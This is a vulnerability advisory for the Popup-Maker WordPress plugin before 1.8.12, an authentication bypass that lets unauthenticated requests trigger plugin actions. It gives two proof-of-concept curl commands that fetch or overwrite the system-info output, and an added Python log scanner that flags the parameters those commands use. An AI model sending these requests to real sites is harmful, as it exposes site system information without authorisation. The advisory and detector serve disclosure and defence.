Popup-Maker < 1.8.12 - Multiple Vulnerabilities



Description
An attacker can partially control the arguments passed to do_action during the initialization of PUM_Site. Because of this, an attacker can call any method hooked to an action whose name starts with popmake_ or pum_. Functions that take no arguments (e.g. PUM_Admin_Tools::sysinfo_download or PUM_Admin_Tools::sysinfo_display), or that take a single array argument, will then execute successfully.
Proof of Concept
curl "http://www.your-domain-with-popup-maker.com/?pum_action=tools_page_tab_system_info"

curl -v -d "popmake_action=popup_sysinfo&popmake-sysinfo=choose any content you like" -X POST http://www.your-domain-with-popup-maker.com/
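
Added example (not part of the original advisory or the plugin's code): a Python pass over web-server access logs that flags requests setting the pum_action or popmake_action parameters used in the proof of concept. The log lines are constructed, and treating requests outside /wp-admin/ as higher priority is an assumption of this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request parameters and action values taken from the proof of concept above.
DISPATCH_PARAMS = ("pum_action", "popmake_action")
ADVISORY_ACTIONS = {"tools_page_tab_system_info", "popup_sysinfo"}

# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_dispatch_requests(lines):
    """Return one finding per request whose query string sets a dispatch parameter."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the expected format
        parts = urlsplit(m["target"])
        # parse_qs percent-decodes names and values before we compare them.
        query = parse_qs(parts.query, keep_blank_values=True)
        for param in DISPATCH_PARAMS:
            for action in query.get(param, []):
                findings.append({
                    "ip": m["ip"],
                    "time": m["time"],
                    "method": m["method"],
                    "param": param,
                    "action": action,
                    "status": int(m["status"]),
                    "in_advisory": action in ADVISORY_ACTIONS,
                    # Assumption: admin tooling is normally reached under /wp-admin/.
                    "outside_admin": not parts.path.startswith("/wp-admin/"),
                })
    return findings

# Constructed sample log lines (documentation addresses, not real traffic).
# The last line is a POST: its form body is not in the log, so it yields no finding.
SAMPLE_LOG = [
    '203.0.113.7 - - [14/Oct/2019:10:01:02 +0000] "GET /?pum_action=tools_page_tab_system_info HTTP/1.1" 200 5120 "-" "curl/7.64.0"',
    '198.51.100.4 - - [14/Oct/2019:10:02:10 +0000] "GET /?s=popup HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [14/Oct/2019:10:03:30 +0000] "GET /?pum%5Faction=tools_page_tab_system_info HTTP/1.1" 200 5120 "-" "curl/7.64.0"',
    '203.0.113.7 - - [14/Oct/2019:10:04:00 +0000] "POST / HTTP/1.1" 200 900 "-" "curl/7.64.0"',
]

if __name__ == "__main__":
    for finding in find_dispatch_requests(SAMPLE_LOG):
        print(finding)
```

Parameters sent in a POST body, as in the second curl command, do not appear in access logs; covering them requires request-body logging at a WAF or in the application.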

Affects Plugin

fixed in version 1.8.13

References

CVE 2019-17574
URL https://blog.redyops.com/wordpress-plugin-popup-maker/

Classification

Type AUTHBYPASS
OWASP Top 10 A2: Broken Authentication and Session Management
CWE CWE-287

Miscellaneous

Original Researcher Dimopoulos Ilias
Submitter Dimopoulos Ilias
Submitter Website https://redyops.com/
Verified No
WPVDB ID 9907

Timeline

Publicly Published 2019-10-14
Added 2019-10-14
Last Updated 2019-10-14
